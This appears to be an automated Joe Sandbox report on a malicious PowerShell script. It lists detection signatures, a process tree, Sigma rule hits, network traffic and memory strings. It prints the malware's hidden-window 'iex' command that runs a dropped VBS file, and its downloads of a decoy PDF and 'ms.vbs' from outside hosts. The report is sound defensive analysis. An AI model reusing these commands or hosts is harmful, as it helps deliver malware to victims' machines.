Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gCXzb0K8Ci.ps1

Overview

General Information

Sample name:gCXzb0K8Ci.ps1
renamed because original name is a hash value
Original sample name:d4e49fb44f2d9c6b2626e82bfbded73e771f55e506618c5a2b47afbcf218bc24.ps1
Analysis ID:1578233
MD5:f66c1baa8805a9f3d84f0d7b253b62b0
SHA1:482e3694cd0de951055dc9c58af3c351fb8a5a78
SHA256:d4e49fb44f2d9c6b2626e82bfbded73e771f55e506618c5a2b47afbcf218bc24
Tags:185-236-228-9287-120-112-91ps1www-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 6176 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 2724 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 6668 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1528,i,9795832297208486948,11593460872991007467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 320 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2696JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_2696.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2696, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'", ProcessId: 6392, ProcessName: powershell.exe
      Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2696, TargetFilename: C:\Users\Public\v49.vbs
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", ProcessId: 2696, ProcessName: powershell.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2696, TargetFilename: C:\Users\Public\v49.vbs
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", ProcessId: 2696, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 320, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: gCXzb0K8Ci.ps1Avira: detected
      Multi AV Scanner detection for submitted file
      Source: gCXzb0K8Ci.ps1ReversingLabs: Detection: 34%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.3% probability
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: Binary string: ystem.pdbm source: powershell.exe, 00000000.00000002.2316431496.00000293F778D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2316431496.00000293F76E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1 source: powershell.exe, 00000000.00000002.2319308884.00000293F7A7C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2316431496.00000293F76E0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.2108563780.000001A0C0426000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2319308884.00000293F7B29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2319308884.00000293F7A7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2105240541.000001A0C017E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdbH source: powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb3K source: powershell.exe, 00000003.00000002.2104667258.000001A0C0108000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbG source: powershell.exe, 00000000.00000002.2319308884.00000293F7AC0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.pdbr source: powershell.exe, 00000000.00000002.2316431496.00000293F778D000.00000004.00000020.00020000.00000000.sdmp
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 11:51:23 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: svchost.exe, 00000007.00000002.3274345952.0000028B56800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A8B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000000.00000002.2305313682.00000293901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2305313682.000002939006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000000.00000002.2219015938.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A80D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2219015938.0000029381B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.2219015938.0000029380232000.00000004.00000800.00020000.00000000.sdmp, gCXzb0K8Ci.ps1String found in binary or memory: http://www.bluhwamaxxlashwar.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.2319223440.00000293F7970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000000.00000002.2219015938.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A80D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A96FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
      Source: svchost.exe, 00000007.00000003.2170632442.0000028B565C0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A89D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A96FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A8B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.2305313682.00000293901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2305313682.000002939006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: qmgr.db.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.asthwanthwarprishwas.com.pk/ms/List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.p
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: classification engineClassification label: mal84.evad.winPS1@20/59@5/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxcmyagf.cl0.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: gCXzb0K8Ci.ps1ReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1528,i,9795832297208486948,11593460872991007467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1528,i,9795832297208486948,11593460872991007467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
